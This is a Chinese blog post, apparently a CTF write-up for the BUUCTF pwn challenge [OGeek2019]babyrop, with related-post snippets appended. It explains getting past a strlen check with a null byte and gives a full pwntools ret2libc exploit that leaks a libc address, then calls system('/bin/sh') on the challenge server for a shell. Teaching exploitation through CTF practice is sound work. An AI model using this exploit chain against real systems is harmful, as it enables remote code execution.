BUUCTF--pwn--[OGeek2019]babyrop【ret2libc】

已于 2022-12-12 11:48:00 修改
阅读量224 收藏 1
点赞数 1
分类专栏: pwn刷题笔记 文章标签: python
于 2022-12-06 16:32:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_73149934/article/details/128201943
版权

保护

ida

s是随机值,不可能让输入的buf和s相等,所以使用字符串截断绕过strlen()

注意buf[v5-1]=0对buf的修改

让buf[7]很大,最大\xff,即255,即可满足栈溢出。

准备 无

exp

from pwn import*
from LibcSearcher3 import*
context.log_level="debug"
elf=ELF("/home/error/桌面/pwn")
#i=process("/home/error/桌面/pwn")
i=remote("node4.buuoj.cn",29715)

p1=b"\x00"+b"a"*6+b"\xff"#这里的构造是重点
i.sendline(p1)
i.recvline()

write_plt=elf.plt["write"]
write_got=elf.got["write"]
main=0x08048825

p2=cyclic(0xE7+4)+flat([write_plt,main,1,write_got,4])
i.sendline(p2)
write_addr=u32(i.recv(4))
print(hex(write_addr))

libc=LibcSearcher("write",write_addr)
libc_base=write_addr-libc.dump("write")
sys_addr=libc_base+libc.dump("system")
she_addr=libc_base+libc.dump("str_bin_sh")

p2=cyclic(0xe7+4)+flat([sys_addr,0,she_addr])
i.sendline(p1)
i.sendline(p2)
i.interactive()

结果

 

X1NRI
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF ciscn_2019_c_1(ret2libc
weixin_45441024的博客
01-04 370
BUUCTF ciscn_2019_c_1(ret2libc) 首先还是check一下,之后放到IDA里面进行分析 可以看到里面有一个encrypt函数,我们来对他进行一个分析,可以看到一个关键点 做法一: 我们可以得出只要输入东西了,这个IF判断就是成立的,所以我们这里需要了解一个知识:在输入的内容前面加入’\0’可以绕过strlen这个函数 在这个函数里我们也可以很快找到溢出的地方,gets函数,对于我们输入的内容长度没有限制,再看上面定义变量的时候,s距离栈底的长度为0x50,纵观函数内容我们
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF--pwn--jarvisoj_level3【ret2libc
qq_73149934的博客
12-04 282
BUUCTF--pwn--jarvisoj_level3
BUUCTF的第二题rip&一道ret2libc
最新发布
I_ET5u5的博客
12-11 239
buuctf的第二题和一道ret2libc的小难点
pwn刷题num38---ret2libc
tbsqigongzi的博客
05-02 306
BUUCTF-PWN-铁人三项(第五赛区)_2018_rop 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 32位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida看源码 read函数输入0x100字节,而buf只有0x88字节,存在栈溢出 buf距离返回地址0x88+0x4字节 观察程序没有后门函数,但存在write函数,
BUUCTF(pwn)x_ctf_b0verfl0w [ret2libc类型]
半岛铁盒的博客
04-06 399
是ret2libc类型 from pwn import * from LibcSearcher import * p = remote('node3.buuoj.cn',25524) elf = ELF('./b0verfl0w') puts_plt=elf.plt['puts'] puts_got=elf.got['puts'] main=0x804850e payload='a'*(0x20+4)+p32(puts_plt) + p32(main) +p32(puts_got) p.s.
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
libc-database:建立libc偏移量数据库以简化开发
04-01
libc数据库现在具有Web服务和前端。 访问尝试一下! 如果您对API感兴趣,请阅读 。 建立一个libc偏移量数据库 如果您遇到错误,请检查下面的“要求”部分。 获取所需的libc类别并提取符号偏移量。 它不会下载任何...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Bugku S3 AWD排位赛-9 pwn二进制
08-27
Bugku S3 AWD排位赛-9 pwn二进制
rOpbaby-CTFPWN ROP练习题
08-21
DefConCTF 2015 Quals CTFPWN ROP练习题 可用于练习基础的ROP
暑假pwn训练(十三) pwn babyrop
doudoudedi
08-26 323
这道题我没时间去仔细的想 emem最后说是00截断长度判断的函数然后正常泄露libc基址getshell 先上exp晚上说说我调试的过程 #coding:utf-8 from pwn import * context.binary = './babyrop' io = remote('47.112.137.238',13337) # io = process('./babyrop') elf ...
BUUCTF pwn——[OGeek2019]babyrop
CNS-Enterprise BCC-1701-J
04-02 231
BUUCTF 做题练习
buuctf|pwn-[HarekazeCTF2019]baby_rop-wp
l2645470582_的博客
11-08 205
1.例行检查 我们看到该文件开启了堆保护 2.我们用64位的IDA打开该文件 按shift+f12查看关键字符串,我们看到“/bin/sh”这个关键字符串 我们双击查看它的位置:0x0601048 3.我们去main函数里面看看 我们发现v4 = var_10,他的地址为:0x10 我们要拿到权限:system("/bin/sh") 所以我们要找到system地址:0x0400490 我们双击_system,system在plt表里面 4...
ret2libc-泄露和不需要泄露
qq_36918532的博客
04-18 235
ciscn_2019_c_1 —需要泄露got 题目可在buuctf下载 安全检查,发现只开了NX保护(DEP) 执行程序会发现,程序第二次原模原样输出了((这种菜单题,我还以为是堆)) IDA查看反汇编代码 加密函数 其中x在bss段定义,一直在增加,所以会导致上面的第二次执行的时候长度>s,从而不执行加密那块,这可以用来泄露地址 也就是后面会变的只有比上一次输入长的部分 操作如下图 由于get可以一直输入,达到一定长度报段错误,这应该是说明覆盖到返回地址了,所以猜想应该是只要覆盖了返回地
BUUCTF--pwn--ciscn_2019_c_1【ret2libc_64】
qq_73149934的博客
12-06 255
BUUCTF--pwn--ciscn_2019_c_1
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2399
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
PWN题型之Ret2Libc
swedsn
03-18 4143
文章目录前言0x1 :使用前提条件0x2 :为什么要这么使用0x3 :使用方法0x4 :实例二、使用步骤总结 前言 菜鸡总结,如有不对,请指点 0x1 :使用前提条件 查看保护:开启了NX保护,但是没有开启PLE保护,可以开启canary保护。但是这样就是两种题型结合了。 打开IDA查看源代码:存在溢出条件,但是没有system函数(/bin/sh)和 flag字样。 ` 0x2 :为什么要这么使用 由于缺少system函数,所以需要构造shellcode。但是开启了NX保护(可执行的不可修改,可修改不可执
[BUUCTF]PWN——cmcc_pwnme1(ret2libc)
mcmuyanga的博客
01-30 661
cmcc_pwnme1 附件 步骤 例行检查,32位程序,没用开启任何保护 本地试运行一下,看看大概的情况 32位ida载入,检索字符串的时候发现了读出flag的函数 这个flag的位置不清楚对不对,按照buu的习性,应该不对 main() getfruit(),这边存在栈溢出 先试一下那个读出flag的函数,和我想的一样,buu上flag的目录不在那儿 因为看到没用开启nx,所以一开始想要使用shellcode,但是碍于没法获得参数v1在栈上的位置,就换用ret2libc的方法了 完整ex
pwn ret2libc原理
08-22
pwn ret2libc是一种攻击技术,其原理是通过利用程序中的栈溢出漏洞,来控制程序的执行流程,以达到执行libc中的函数的目的。 在ret2libc攻击中,程序会调用libc库中的函数,例如system函数,来执行特定的操作。但是...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值